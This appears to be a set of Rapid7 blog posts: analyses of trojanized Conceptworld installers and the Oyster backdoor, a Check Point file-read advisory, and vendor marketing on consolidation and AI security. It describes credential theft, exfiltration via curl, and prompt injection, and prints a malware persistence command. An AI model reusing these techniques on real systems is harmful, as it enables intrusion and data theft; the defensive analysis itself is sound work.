The following Rapid7 analysts contributed to this research: Leo Gutierrez, Tyler McGraw, Sarah Lee, and Thomas Elkins.

Executive Summary

On Tuesday, June 18th, 2024, Rapid7 initiated an investigation into suspicious activity in a customer environment. Our investigation identified that the suspicious behavior was emanating from the installation of Notezilla, a program that allows for the creation of sticky notes on a Windows desktop. Installers for Notezilla, along with tools called RecentX and Copywhiz, are distributed by the India-based company Conceptworld at the official domain conceptworld[.]com. After analyzing the installation packages for all three programs, Rapid7 discovered that the installers had been trojanized to execute information-stealing malware that has the capability to download and execute additional payloads.

Disclosure

On Monday, June 24th, 2024, Rapid7 contacted Conceptworld to disclose the backdoored installers being hosted on conceptworld[.]com in accordance with Rapid7’s vulnerability disclosure policy. Within 12 hours, Conceptworld confirmed and remediated the issue by removing the malicious installers from conceptworld[.]com and replacing them with legitimate, signed copies. Rapid7 is grateful to Conceptworld for their prompt action on this issue.

Overview

Conceptworld is an India-based company offering three different software products: Notezilla, which allows users to create sticky notes on a Windows desktop; RecentX, which stores recently used files/applications/clipboard data; and Copywhiz, which improves file copying and backup operations. A free trial download is available on the official conceptworld[.]com site for each software package.

The installation packages being served by conceptworld[.]com at the time of investigation, however, executed malware alongside the legitimate installer, were not signed, and did not match the file size stated on the download page. The differences in the file sizes are due to the malware and its dependencies, which increases the size of the compromised installation packages.

The malware Rapid7 observed contains the functionality to steal browser credentials and crypto currency wallet information, log clipboard contents and keystrokes, and download and execute additional payloads. After infecting a system, the malware persists via a scheduled task that executes the primary payload every three hours.

Based on file submissions to VirusTotal, the malicious copies of the installers have existed since early June of 2024. The malware payloads delivered by the trojanized installers, however, seem to belong to a nameless malware family that has been in distribution since at least January of 2024. Rapid7 internally refers to this malware family as dllFake because of the naming scheme used for several of the malware payloads.

Technical analysis

To take a deeper look at the malware payloads, we will analyze the malicious installer that was served for Notezilla.

Initial Access

Rapid7 determined that trojanized installers for the 32-bit and 64-bit versions of Notezilla, Copywhiz, and RecentX were, at the time of investigation, being served from the official website conceptworld[.]com. Any users searching for this software via a popular search engine at the time were most likely to find the official domain as the first result, which would then have directed them to download the malware.

Execution

The installer served by conceptworld[.]com for Notezilla at the time of investigation was NotezillaSetup.exe, which, based on static analysis, is packed using software called Smart Install Maker(5.04).

Figure 1. Software Properties of NotezillaSetup.exe.

Using the sim_unpacker plugin for the tool UniExtract2, we were able to unpack and acquire most of the contents of the installation package, such as the embedded files and configuration information. The configuration file contains references to the legitimate software installer for Notezilla, which is dropped into %TEMP% during execution, and multiple files that are dropped into the installation directory (i.e., staging folder) %LOCALAPPDATA%\Microsoft\WindowsApps\ during execution.

Figure 2. Output from Using the sim-unpacker tool.

Figure 3. Contents of installer.config.

Once executed, NotezillaSetup.exe will then execute the file dllCrt32.exe from the staging directory %LOCALAPPDATA%\Microsoft\WindowsApps\ via a WINAPI call to ShellExecuteA with the verb open. A second call is then made to ShellExecuteA to execute the file NotezillaSetup.exe, a copy of the legitimate installer, from %TEMP%. As a result, the only thing seen by the end user after initial execution is the installation window pop-up for the legitimate installer, prompting the user to proceed with the installation process for Notezilla.

Figure 4. Typical Process Tree for Initial Execution of the Trojanized Installer.

Figure 5. The User’s View after the Infection has Already Begun in the Background.

The file dllCrt32.exe is a relatively small (~10KB) program that only serves as a wrapper to call CreateProcessA to execute the file dllCrt.bat.

Figure 6. The Contents of dllCrt.bat.

The batch file dllCrt.bat will then create a hidden scheduled task named Check dllHourly32 using schtasks.exe and an XML file that was previously dropped into the staging directory at %LOCALAPPDATA%\Microsoft\WindowsApps\dllCrt.xml. The scheduled task Check dllHourly32 will then execute the file %LOCALAPPDATA%\Microsoft\WindowsApps\dllBus32.exe every three hours after being initially created, which means that the primary malware payload will not be executed until at least three hours after the user originally executed the trojanized installer.

Figure 7. Command Line Assembly within dllBus32.exe.

When dllBus32.exe is executed, it also serves as a small wrapper for calling CreateProcessA, though it initially retrieves several important command line parameters. First, a call to the CRT library function sprintf concatenates a hard-coded IPv4 address. Then, a second call to sprintf concatenates the assembled IPv4 address with several other arguments to be passed to the batch file dllBus.bat. Finally, CreateProcessA is called with the fully assembled command line.

Figure 8. The Initial Lines of dllBus.bat.

The command line arguments passed to dllBus.bat via dllBus32.exe contain an IPv4 address, an SFTP port, a password for ZIP archive payloads, two sets of SFTP credentials, and the staging directory where the majority of the malware’s files are located.

The batch file dllBus.bat contains functionality to facilitate the theft of information from Google Chrome, Mozilla Firefox, and multiple cryptocurrency wallets. The copy of curl.exe dropped by the installer is also used to connect to a list of command-and-control (C2) addresses hosting SFTP servers. The curl commands are used to download an updated list of C2 addresses, stored as plaintext within the file dll_srv.txt, and to download and execute additional payloads saved within encrypted ZIP archives named Updt.zip, Apps.zip, and BB.zip. The batch script will also attempt to compress all files on the infected system that have specific file extensions and exist in directories that are not on a hardcoded blacklist (for exfiltration). All stolen data is ultimately compressed using 7z.exe and uploaded directly to the selected C2 SFTP server using curl.

The payloads Apps.zip and Updt.zip both contain executables created using PyInstaller, which means the original Python script used to create the executables can be recovered trivially using a publicly available extractor. The payload dllChrome32.exe, contained within Updt.zip, is used to facilitate theft of credentials from Google Chrome’s database that are then saved into the file %TEMP%\chrm.txt with the format: URL, Username, Password.

Figure 9. Primary Functionality of dllChrome32.exe.

The payloads dllTemp32.exe and dllCache32.exe stored within Apps.zip contain a clipboard stealer and a keylogger, where the results are saved to the files cl.txt and kl.txt, respectively, within the staging directory at %LOCALAPPDATA%\Microsoft\WindowsApps\.

Figure 10. All Data Copied to the Clipboard is Dumped to cl.txt when dllTemp32.exe is Running.

Figure 11. dllCache32.exe Logs Keystrokes to kl.txt when Running.

Rapid7 did not observe any of the identified SFTP servers hosting the third payload, BB.zip, at the time of writing, although the contents of dllBus.bat indicate that it contains the executables srvBus32.exe and srvCrt32.exe, which serve an unknown function.

Mitigation Guidance

Rapid7 recommends verifying the file integrity of freely available software. Check that the file hash and properties of the downloaded file(s) match those provided by the official distributor and/or that they contain a valid and relevant signature. The malicious installers observed in this case are unsigned and have a file size that is inconsistent with copies of the legitimate installer, even as noted on the official download page.

If an installer for Notezilla, RecentX, or Copywhiz has been executed on a system within the last month, Rapid7 recommends checking for signs of compromise due to the malicious installers detailed in this blog. The primary indicators of infection include the hidden scheduled task Check dllHourly32 and a persistent running instance of the Windows Command Prompt, cmd.exe, which makes outbound network connections via curl.exe.

If evidence of compromise is found, Rapid7 recommends re-imaging affected systems to a known good baseline to eradicate any changes made by the malware.

Rapid7 Customers

InsightIDR, Managed Detection and Response, and Managed Threat Complete customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this activity:

MITRE ATT&CK Techniques

Indicators of Compromise

Network-Based Indicators (NBIs)

Host-Based Indicators (HBIs)

Embracing a consolidated security ecosystem

Authored by Ralph Wascow

Cybersecurity is as unpredictable as it is rewarding. Each day often presents a new set of challenges and responsibilities, particularly as organizations accelerate digital transformation efforts. This means you and your cyber team may find yourselves navigating a complex landscape of multi-cloud environments and evolving compliance requirements.

So how does that translate into what cyber professionals have to deal with on a daily basis?

A Day in the Life of a Security Professional

In the Trenches

The responsibility of safeguarding sensitive data and protecting that very same data can create a constant pressure to stay one step ahead – of many things. Teams defending environments often face high stress levels and tight deadlines. Unsurprisingly, the demand for skilled security leaders often outpaces the supply of personnel. This is where an array of tools and solutions are introduced to support those teams. And while there are many positives to be had, security teams are often overrun by an array of solutions and vendors, creating increased complexity and vulnerabilities in their organisation’s risk posture.

Multiple Vendors Often Means More Work

Using different vendors and solutions for various security functions can help keep things fresh, but it can also be time-consuming and cumbersome. And rather than help teams, it may lead to a decrease in performance. With each platform and tool requiring its own resources, the overall efficiency of your infrastructure and processes may suffer. These performance issues can impact critical business operations and hinder productivity. For instance, by the time you receive a threat alert, the attacker could already be hard at work.

Security analysts require a streamlined work environment that enables them to understand the root cause of alerts from any source with a single click. They shouldn’t have to waste time switching between multiple tools to investigate and remediate potential threats. And when belts start tightening and resources become scarce, managing multiple vendors with different payment cycles can become frustrating.

It pays to find ways to create a security ecosystem without sacrificing the efficacy of its components. By reducing the number of disparate cyber solutions, security professionals can optimise effectiveness and efficiency, subsequently enhancing security posture and reducing their risk profile.

What are the Benefits of a Unified Security Ecosystem?

Widening visibility into your entire IT environment strengthens threat detection capabilities, allowing security teams to minimise the impact of potential cyberattacks. In fact, 41% of organisations surveyed by Gartner say consolidating security solutions improved their risk posture. For some organisations still clinging to the status quo of best of breed solutions, consider the following consolidation benefits when trying to gain executive-buy-in.

Identify Systems and Applications at Risk

A robust vulnerability management program should be your first port of call to help identify any systems or applications potentially at risk. It provides your security team with critical insight into potential weaknesses in your IT infrastructure and overall network. Importantly, it will enable you to properly manage and patch vulnerabilities that pose risks to the network, protecting your organisation from the possibility of a breach.

Safeguard an Evolving Landscape with Real-time Monitoring

Continuous scanning and testing of applications are vital components of a robust security strategy. Consolidating your security tech stack into a centralised ecosystem offers the ability to monitor your infrastructure in real-time and receive in-depth reports for better cross-team collaboration. Actionable insight gained will give you and your security team the autonomy you need to stay ahead of evolving risks and proactively address potential vulnerabilities.

Broaden Visibility and Contextual Understanding

Avoid leaving your security team with isolated alerts that require manual investigation and correlation. Integrating data from multiple sources, including endpoints, networks, cloud environments, and applications offers a comprehensive view and analysis of threats across different layers of the IT environment. This holistic approach allows for better correlation of data across various vectors, uncovering complex attack patterns that might otherwise go unnoticed. Consider broadening your context with threat intelligence, providing information about actor groups, typical targets, TTP's, and more.

Automate Threat Hunting and Distinguish Friend from Foe

In the face of ever-evolving threats, automating threat hunting becomes a crucial capability. By integrating automation within your consolidated security ecosystem, you’ll be able to quickly discern whether incoming threats are benign or malicious. Streamlined processes allow for efficient identification of potential risks, enabling you and your team to prioritize your efforts for activities that require human effort.

Prioritize Risk and Simplify Workflows

The sheer volume of security alerts can overwhelm even the most robust security operations. A consolidated security ecosystem mitigates this challenge by automatically grouping related alerts and prioritising events that demand immediate attention. Unifying and visualizing activities in one place more rapidly identify the root causes of threats and their potential impact. Armed with this knowledge, you can assess the scope of an incident efficiently, build a timeline of the attack, and take swift, targeted action to effectively neutralize the threat.

Swiftly Investigate with End-to-end Digital Forensics

Incident resolution demands a thorough understanding of the attack's entry point and the ability to track down any traces left by adversaries. With a consolidated security ecosystem, conduct swift and comprehensive investigations using end-to-end digital forensics and review key artefacts such as event logs, registry keys, and browser history across your entire IT environment — significantly enhancing your incident response capabilities. A full view of attacker activity can help you determine the extent of the compromise, identify weaknesses in your defenses, and take appropriate remedial actions.

Coordinate Responses with Remediation and Policy Enforcement

Enable coordinated responses and future-proof defences by integrating prevention technologies across your entire tech stack. Leverage communication between various security components and take decisive action against active threats in real-time. For example, an attack blocked on the network can automatically update policies on endpoints, ensuring consistent security measures across your infrastructure. This proactive approach to security ultimately reduces the risk of successful cyberattacks.

Consolidate to Mitigate

With a rapidly changing threat landscape, consolidation offers the security improvements your organisation needs to give it the balance of power. Simplifying and streamlining your cybersecurity solutions begins with gaining visibility into your tech stack. This enables your team to identify where consolidation can improve your team’s productivity and effectiveness in detecting and mitigating risk.

How Rapid7 Can Help: Managed Threat Complete

Managed Threat Complete offers a simplified security stack, fuelling your D&R program to give you a 24x7x365 SOC, IR, XDR technology, SIEM, SOAR, threat intelligence, and unlimited VRM in a single service. This ensures your environment is monitored round-the-clock and end-to-end by an elite SOC that works transparently with your in-house team, helping to further expand your resources.

Learn more.

The following analysts contributed to this blog: Thomas Elkins, Daniel Thiede, Josh Lockwood, Tyler McGraw, and Sasha Kovalev.

Executive Summary

Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams. The installers were being used to drop a backdoor identified as Oyster, aka Broomstick. Following execution of the backdoor, we have observed enumeration commands indicative of hands-on-keyboard activity as well as the deployment of additional payloads.

In this blog post, we will examine the delivery methods of the Oyster backdoor, provide an in-depth analysis of its components, and offer a Python script to help extract its obfuscated configuration.

Overview

Initial Access

In three separate incidents, Rapid7 observed users downloading supposed Microsoft Teams installers from typo-squatted websites. Users were directed to these websites after using search engines such as Google and Bing for Microsoft Teams software downloads. Rapid7 observed that the websites were masquerading as Microsoft Teams websites, enticing users into believing they were downloading legitimate software when, in reality, they were downloading the threat actor’s malicious software.

Figure 1 - Fake Microsoft Teams Website

In one case, a user was observed navigating to the URL hxxps://micrsoft-teams-download[.]com/, which led to the download of the binary MSTeamsSetup_c_l_.exe. Initial analysis of the binary MSTeamsSetup_c_l_.exe showed that the binary was assigned by an Authenticode certificate issued to “Shanxi Yanghua HOME Furnishings Ltd”.

Figure 2 - MSTeamsSetup_c_l_.exe File Information

Searching VirusTotal for other files signed by “Shanxi Yanghua HOME Furnishings Ltd” showed the following:

Figure 3 - VirusTotal Signature Search Results

The results indicated other versions of the installer, each impersonating as a legitimate software installer. We observed that the first installer was submitted to VirusTotal around mid-May 2024.

In a related incident that occurred on May 29, 2024, we observed another binary posing as a Microsoft Teams setup file, TMSSetup.exe, which was assigned a valid certificate issued to “Shanghai Ruikang Decoration Co., Ltd”. As of May 30, 2024, that certificate has been revoked.

VirusTotal analysis of the binary MSTeamsSetup_c_l_.exe indicates it is associated with a malware family known as Oyster, dubbed Broomstick by IBM.

What is Oyster/Broomstick?

Oyster aka Broomstick aka CleanUpLoader is a family of malware first spotted in September of 2023 by researchers at IBM. While not much is known about the malware, it was delivered via a loader called Oyster Installer, which masqueraded as a browser installer. The installer was responsible for dropping the backdoor component, Oyster Main. Oyster Main was responsible for gathering information about the compromised host, handling communication with the hard-coded command-and-control (C2) addresses, and providing the capability for remote code execution.

In February, researchers on Twitter observed the same backdoor component and started to name the Oyster Main backdoor, CleanUpLoader.

In recent incidents, Rapid7 has observed Oyster Main being delivered without the Oyster Installer.

Technical Analysis

Initial analysis of the binary MSTeamsSetup_c_l_.exe revealed that two binaries were stored within the resource section. During execution, a function was observed using FindResourceA to locate the binaries, followed by LoadResource to access them. These binaries were then subsequently dropped into the Temp folder. We observed that the intended names of the two binaries dropped by MSTeamsSetup_c_l_.exe were CleanUp30.dll and MSTeamsSetup_c_l_.exe (the legitimate Microsoft Teams installer).

After dropping the binary CleanUp30.dll into the Temp directory, the program executes the DLL, passing the string rundll32.exe %s,Test to the function CreateProcessA, where %s stores the value CleanUp30.dll.

Figure 4 - Execution of CleanUp30.dll

After the execution of CleanUp30.dll, the program proceeds to initiate the legitimate Microsoft Teams installer, MSTeamsSetup_c_l_.exe, also located within the Temp directory. This tactic is employed to avoid raising suspicion from the user.

CleanUp30.dll Analysis

During the execution of CleanUp30.dll, Rapid7 observed that the binary starts by attempting to create the hard coded mutual exclusion (mutex) ITrkfSaV-4c7KwdfnC-Ds165XU4C-lH6R9pk1. Mutex creation is often used by programs in order to determine if the program is already running another instance. If the program is already running, the program will terminate the new instance.

After creating the mutex, the binary determines its execution path by calling the function GetModuleFilenameA. The value is stored as a string and used as a parameter for the creation of a scheduled task, ClearMngs. The scheduled task is created using the function ShellExecuteExW, passing the following as the command line:

schtasks.exe /create /tn ClearMngs /tr "rundll32 '<location of binary>\CleanUp30.dll',Test" /sc hourly /mo 3 /f

The purpose of the scheduled task ClearMngs is to execute the binary <location of binary>\CleanUp30.dll with the exported function of Test using rundll32.exe every three hours.

After the creation of the scheduled task, the binary then proceeds to decode its C2 servers using a unique decoding function. The decoding function begins by taking in a string of encoded characters, and its length is in bytes. The decoding function then proceeds to read in each byte, starting from the end of the encoded string.

Figure 5 - The DLL’s Decoding Loop

Each byte of the encoded string is used as an index location to retrieve the decoded byte from a hard-coded byte map. A byte map is a byte array containing 256 bytes in a randomized order, one for each possible byte value from 1 to 256. Malware authors sometimes use this technique to obfuscate strings and other data. The iteration counter (i) used within the condition for the decoding loop is compared to half of the encoded string’s length as the decoding loop swaps two bytes at a time. The bytes of the encoded string are decoded and swapped beginning at the start and end bytes of the string and the decoding loop then progresses towards the center of the string from each end.

The loop swaps the bytes to reverse the decoded string, as the original plaintext strings stored in the malware were reversed prior to encoding. When the center of the string is reached, the decoding process is complete. Due to this algorithm, all the encoded strings that are passed must be of even length to avoid further processing. Immediately after the decoded string is loaded onto the stack, the malware then re-encodes the string using a similar loop. The final result for the first decoded string is a carriage return line feed (CRLF) delimited list of C2 domains.

We constructed a Python script that can decode all the encoded strings contained within the CleanUp.dll binaries, including previous versions. The Python script can be found in our GitHub repository.

Figure 6 - Sample Output from Python Script

Using our Python script, it revealed some of the C2 functionality, along with several JSON fields that are used to build a fingerprint of the infected system:

After the binary decodes the C2 addresses, the program proceeds to fingerprint the infected machine, using the following functions:

Figure 7 - A Selection of Contents of the CleanUp30.dll Code that Outline the Collection of System Information

While enumerating information about the host, the information is stored in the JSON fields uncovered from the encoded strings identified above.

Figure 8 - Example of the Data Collected and Sent via HTTP POST to the Malicious Domains

The fingerprint information is encoded using the same loop previously discussed, where the data string is reversed and encoded using a byte map before being sent.

After the information is encoded, it is sent to the domains whereverhomebe[.]com/, supfoundrysettlers[.]us/, and retdirectyourman[.]eu/ via HTTP POST method. Rapid7 determined that CleanUp30.dll uses the open-source C++ library Boost.Beast to communicate with the observed C2 domains via HTTP and web sockets.

Figure 9 - Captured Network Traffic Attempting to Send POST Requests to whereverhomebe[.]com/ and supfoundrysettlers[.]us/ Following the Execution of CleanUp30.dll

Follow-on Activity

In one of the incidents Rapid7 observed, a PowerShell script was spawned following the execution of another version of CleanUp30.dll, CleanUp.dll. CleanUp.dll, similar to CleanUp30.dll, was originally dropped by the other fake Microsoft Teams installer, TMSSetup.exe, which dropped the binary into the AppData/Local/Temp directory as well.

Figure 10 - PowerShell Command Creating .lnk File DiskCleanUp.lnk

The purpose of the PowerShell script was to create a shortcut LNK file named DiskCleanUp.lnk within C:\Users\<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\. By doing so, this ensured that the LNK file DiskCleanUp.lnk would be run each time the user logged in. The shortcut LNK file was responsible for executing the binary CleanUp.dll using rundll32.exe, passing the export Test.
Following the execution of the PowerShell script, Rapid7 observed execution of additional payloads:

• k1.ps1
• main.dll
• getresult.exe

Unfortunately, during the incident, we were unable to acquire the additional payloads. During the incidents, Rapid7 also observed execution of the following enumeration commands:

Rapid7 Customers

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this malware campaign:

• Persistence - SchTasks Creating A Task Pointed At Users Temp Or Roaming Directory
• Suspicious Process: RunDLL32 launching CMD or PowerShell
• Persistence - Schtasks.exe Creating Task That Executes RunDLL32
• Network Discovery - Nltest Enumerate Domain Controllers
• Attacker Technique - Determining External IP Via Command Line
• Suspicious Process - .lnk in PowerShell Command Line

MITRE ATT&CK Techniques

IOCs

References

By: Nicholas Handy, Director of Technical Alliances & Partnerships at Cado Security

Velociraptor is a robust  open-source tool designed for collecting and querying forensic and incident response artifacts across various endpoints. This powerful tool  allows incident responders to effortlessly gather data from remote systems, regardless of their location.

Advanced data analysis with the Cado Security Platform

The Cado Security platform is a complementary technology that enables analysis and process of captured data at scale and from multiple sources. In conjunction with  Velociraptor data, Cado analyzes data captured from cloud VMs, container-based, serverless, and SaaS environments. The platform automatically scales up and down to provide fast, parallel data processing. This means that it can process hundreds of systems simultaneously.

The Cado Security Platform integrates seamlessly  with Velociraptor, creating a comprehensive suite for  end-to-end data capture and analysis. In fact, Cado’s existing customers routinely analyze data collected by Velociraptor during investigations using this  platform, making the most of its powerful capabilities

Optimized data processing and analysis

A common use case involves users performing  offline triage to create an agent to collect Windows.KapeFiles from endpoints, to  then upload these  to cloud storage where Cado can import, process, and analyze them. This capability leverages Cado's cloud-based parallel processing to quickly normalize collected artifacts. Cado creates a timeline of what happened on the systems, runs analysis against the files and enables an analyst to search and browse the captured data.

Enhanced threat visibility

The Cado Security Platform creates detailed timelines of system events, conducts thorough file analysis, and enables analysts to search and browse captured data efficiently. This detailed insight is invaluable for understanding the full impact of threats.

With Velociraptor and The Cado Security Platform working together, incident response teams can achieve  a better understanding of the impact of threats with complete visibility across their entire ecosystem, enhancing the overall efficiency of forensic investigations and incident response.

AI-TRiSM - Trust, Risk and Security Management in the Age of AI

Co-authored by Lara Sunday and Pojan Shahrivar

As artificial intelligence (AI) and machine learning (ML) technologies continue to advance and proliferate, organizations across industries are investing heavily in these transformative capabilities. According to Gartner, by 2027, spending on AI software will grow to $297.9 billion at a compound annual growth rate of 19.1%. Generative AI (GenAI) software spend will rise from 8% of AI software in 2023 to 35% by 2027.

With the promise of enhanced efficiency, personalization, and innovation, organizations are increasingly turning to cloud environments to develop and deploy these powerful AI and ML technologies. However, this rapid innovation also introduces new security risks and challenges that must be addressed proactively to protect valuable data, intellectual property, and maintain the trust of customers and stakeholders.

Benefits of Cloud Environments for AI Development

Cloud platforms offer unparalleled scalability, allowing organizations to easily scale their computing resources up or down to meet the demanding requirements of training and deploying complex AI models.

"The ability to spin up and down resources on-demand has been a game-changer for our AI development efforts," says Stuart Millar, Principal AI Engineer at Rapid7. "We can quickly provision the necessary compute power during peak training periods, then scale back down to optimize costs when those resources are no longer needed."

Cloud environments also provide a cost-effective way to develop AI models, with usage-based pricing models that avoid large upfront investments in hardware and infrastructure. Additionally, major cloud providers offer access to cutting-edge AI hardware and pre-built tools and services, such as Amazon SageMaker, Azure Machine Learning, and Google Cloud AI Platform, which can accelerate development and deployment cycles.

Challenges and Risks of Cloud-Based AI Development

While the cloud offers numerous advantages for AI development, it also introduces unique challenges that organizations must navigate. Limited visibility into complex data flows and model updates can create blind spots for security teams, leaving them unable to effectively monitor for potential threats or anomalies.

In their  AI Threat Landscape Report, HiddenLayer highlighted that 98% of all the companies surveyed identified that elements of their AI models were crucial to their business success, and 77% identified breaches to their AI in the past year. Additionally, multi-cloud and hybrid deployments bring monitoring, governance, and reporting challenges, making it difficult to assess AI/ML risk in context across different cloud environments.

New Attack Vectors and Risk Types

Developing AI in the cloud also exposes organizations to new attack vectors and risk types that traditional security tools may not be equipped to detect or mitigate. Some examples include:

Prompt Injection (LLM01): Imagine a large language model used for generating marketing copy. An attacker could craft a special prompt that tricks the model into generating harmful or offensive content, damaging the company's brand and reputation.

Training Data Poisoning (LLM03, ML02): Adversaries can tamper with training data to compromise the integrity and reliability of cloud-based AI models. In the case of an AI model used for image recognition in a security surveillance system, poisoned training data containing mislabeled images could cause the model to generate incorrect classifications, potentially missing critical threats.

Model Theft (LLM10, ML05): Unauthorized access to proprietary AI models deployed in the cloud poses risks to intellectual property and competitive advantage. If a competitor were to steal a model trained on a company's sensitive data, they could potentially replicate its functionality and gain valuable insights.

Supply Chain Vulnerabilities (LLM05, ML06): Compromised libraries, datasets, or services used in cloud AI development pipelines can lead to widespread security breaches. A malicious actor might introduce a vulnerability into a widely used open-source library for AI, which could then be exploited to gain access to AI models deployed by multiple organizations.

Developing Best Practices for Securing AI Development

To address these challenges and risks, organizations need to develop and implement best practices and standards tailored to their specific business needs, striking the right balance between enabling innovation and introducing risk.

While guidelines like NCSC Secure AI System Development and The Open Standard for Responsible AI provide a valuable starting point, organizations must also develop their own customized best practices that align with their unique business requirements, risk appetite, and AI/ML use cases. For instance, a financial institution developing AI models for fraud detection might prioritize best practices around data governance and model explainability to ensure compliance with regulations and maintain transparency in decision-making processes.

Key considerations when developing these best practices include:

Ensuring secure data handling and governance throughout the AI lifecycle

• Implementing robust access controls and identity management for AI/ML resources
• Validating and monitoring AI models for potential biases, vulnerabilities, or anomalies
• Establishing incident response and remediation processes for AI-specific threats
• Maintaining transparency and explainability to understand and audit AI model behavior

Rapid7's Approach to Securing AI Development

"At Rapid7, our InsightCloudSec solution offers real-time visibility into AI/ML resources running across major cloud providers, allowing security teams to continuously monitor for potential risks or misconfigurations," says Aniket Menon, VP, Product Management. "Visibility is the foundation for effective security in any environment, and that's especially true in the complex world of AI development. Without a clear view into your AI/ML assets and activities, you're essentially operating blind, leaving your organization vulnerable to a range of threats."

Here at Rapid7 our AI TRiSM (Trust, Risk, and Security Management) framework empowers our teams. The framework provides us with confidence not only in our operations but also in driving innovation. In their recent blog outlining the company’s AI principles, Laura Ellis and Sabeen Malik shared how Rapid7 tackles and addresses AI challenges. Centering on transparency, fairness, safety, security, privacy, and accountability, these principles are not just guidelines; they are integral to how Rapid7 builds, deploys, and manages AI systems.

Security and compliance are two key InsightCloudSec capabilities. Compliance Packs are out-of-the-box collections of related Insights focused on industry requirements and standards for all of your resources. Compliance packs may focus on security, costs, governance, or combinations of these across a variety of frameworks, e.g., HIPAA, PCI DSS, GDPR, etc.

Last year Rapid7 launched the Rapid7 AI/ML Security Best Practices compliance pack, the pack allows for real-time and continuous visibility into AI/ML resources running across your clouds with support for GenAI services across AWS, Azure and GCP. To empower you to assess this data in the context of your organizational requirements and priorities, you can then automatically prioritize AI/ML-related risk with Layered Context based on exploitability and potential business impact.

You can also leverage Identity Analysis in InsightCloudSec to collect and present the actions executed by a given user or role within a certain time period. These logged actions are collected and analyzed, providing you with a view across your organization of who can access AI/ML resources and automatically rightsize in accordance with the least privilege access (LPA) concept. This enables you to strategically inform your policies moving forward. Native automation allows you to then act on your assessments to alert on compliance drift, remediate AI/ML risk, and enact prevention mechanisms.

Rapid7’s Continued Dedication to AI Innovation

As an inaugural signer of the CISA Secure by Design Pledge, and through our partnership with Queen's University Belfast Centre for Secure Information Technologies (CSIT), Rapid7 remains dedicated to collaborating with industry leaders and academic institutions to stay ahead of emerging threats and develop cutting-edge solutions for securing AI development.

As the adoption of AI and ML capabilities continues to accelerate, it's imperative that organizations have the knowledge and tools to make informed decisions and build with confidence. By implementing robust best practices and leveraging advanced security tools like InsightCloudSec, organizations can harness the power of AI while mitigating the associated risks and ensuring their valuable data and intellectual property remain protected.

To learn more about how Rapid7 can help your organization develop and implement best practices for securing AI development, visit our website to request a demo.

Gartner, Forecast Analysis: Artificial Intelligence Software, 2023-2027, Worldwide, Alys Woodward, et al, 07 November 2023

Rapid7 recently released our 2024 Attack Intelligence Report, a 14-month deep dive into the vulnerability and attacker landscape. The spiritual successor to our annual Vulnerability Intelligence Report, the AIR includes data from the Rapid7 research team combined with our detection and response and threat intelligence teams. It is designed to provide the clearest view yet into what security professionals face day to day.

In this blog, we would like to focus on one area of research the AIR highlights: network edge technologies. In 2023 (and early 2024) Rapid7 found some startling information about the vulnerability of these critical devices. Essentially, of the mass compromise events we studied, exploitation of network edge tech increased significantly over the 14 months the report covers — something we will cover in detail shortly.

But first, some background. Way back in 2020, Rapid7 created a new attacker utility category for vulnerabilities that functioned as network pivots. These are vulnerabilities that give external attackers internal network access. Think VPNs, firewalls, security gateways, etc. They serve an important function in any network but visibility into these devices can be challenging, making them prime targets for attackers.

In 2023 we saw a surge in attacks on these network appliances. Mass compromise events stemming from exploitation of network edge tech nearly doubled over the period studied — with 36% of all widely exploited vulnerabilities occurring within network perimeter technology. Looking back over the previous reports, we determined some 60% of all of the vulnerabilities Rapid7 analyzed in network edge devices over a three year period were exploited as zero-days, a disproportionate number when looking at the entirety of the vulnerabilities studied.

Over the four years Rapid7 has been categorizing this type of vulnerability, network edge devices have comprised 24% of exploited vulnerabilities and a quarter of all widespread threats.

State-sponsored groups and ransomware groups like Cl0p, Inc, Bl00dy, Akira, Play, LockBit, and more went after network edge tech in 2023. Network edge devices are essential for modern network operations, but they also represent a major weak spot in cybersecurity defenses — one that these organized groups took advantage of in 2023.

There are a number of reasons for this. It can be difficult to detect intrusions on these types of devices as the capabilities for logging and threat detection vary depending on the specific devices used. Some do not log key events, they use a variety of firmware and (often proprietary) operating systems, and in some cases the firmware itself may be encrypted or obfuscated. This makes monitoring and detecting intrusions troublesome across different devices and developing a strategy for the entire spectrum of devices complex.

For more information about network edge technology vulnerabilities, as well as the latest data on ransomware, attacker utilities, widespread threats, file transfer vulns, and more, download the 2024 Attack Intelligence Report.

On May 28, 2024, Check Point published an advisory for CVE-2024-24919, a high-severity information disclosure vulnerability affecting Check Point Security Gateway devices configured with either the “IPSec VPN” or “Mobile Access” software blade.

On May 29, 2024, security firm mnemonic published a blog reporting that they have observed in-the-wild exploitation of CVE-2024-24919 since April 30, 2024, with threat actors leveraging the vulnerability to enumerate and extract password hashes for all local accounts, including accounts used to connect to Active Directory. They’ve also observed adversaries moving laterally and extracting the “ntds.dit” file from compromised customers' Active Directory servers, within hours of an initial attack against a vulnerable Check Point Gateway.

On May 30, 2024, watchTowr published technical details of CVE-2024-24919 including a PoC.

On May 31, 2024, Check Point updated their advisory to state that further analysis has revealed that the first exploitation attempts actually began on April 7, 2024, and not April 30 as previously thought.

The vulnerability allows an unauthenticated remote attacker to read the contents of an arbitrary file located on the affected appliance. For example, this allows an attacker to read the appliances /etc/shadow file, disclosing the password hashes for local accounts. The attacker is not limited to reading this file and may read other files that contain sensitive information. An attacker may be able to crack the password hashes for these local accounts, and if the Security Gateway allows password only authentication, the attacker may use the cracked passwords to authenticate.

Mitigation Guidance

According to the vendor advisory, the following products are vulnerable to CVE-2024-24919:

• CloudGuard Network
• Quantum Maestro
• Quantum Scalable Chassis
• Quantum Security Gateways
• Quantum Spark Appliances
  

Check Point has advised that a Security Gateway is vulnerable if one of the following configuration is applied:

• If the “IPSec VPN” blade has been enabled and the Security Gateway device is part of the “Remote Access” VPN community.
• If the “Mobile Access” blade has been enabled.
  

Check Point has released hotfixes for Quantum Security Gateway, Quantum Maestro, Quantum Scalable Chassis, and Quantum Spark Appliances. We advise customers to refer to the Check Point advisory for the most current information on affected versions and hotfixes.

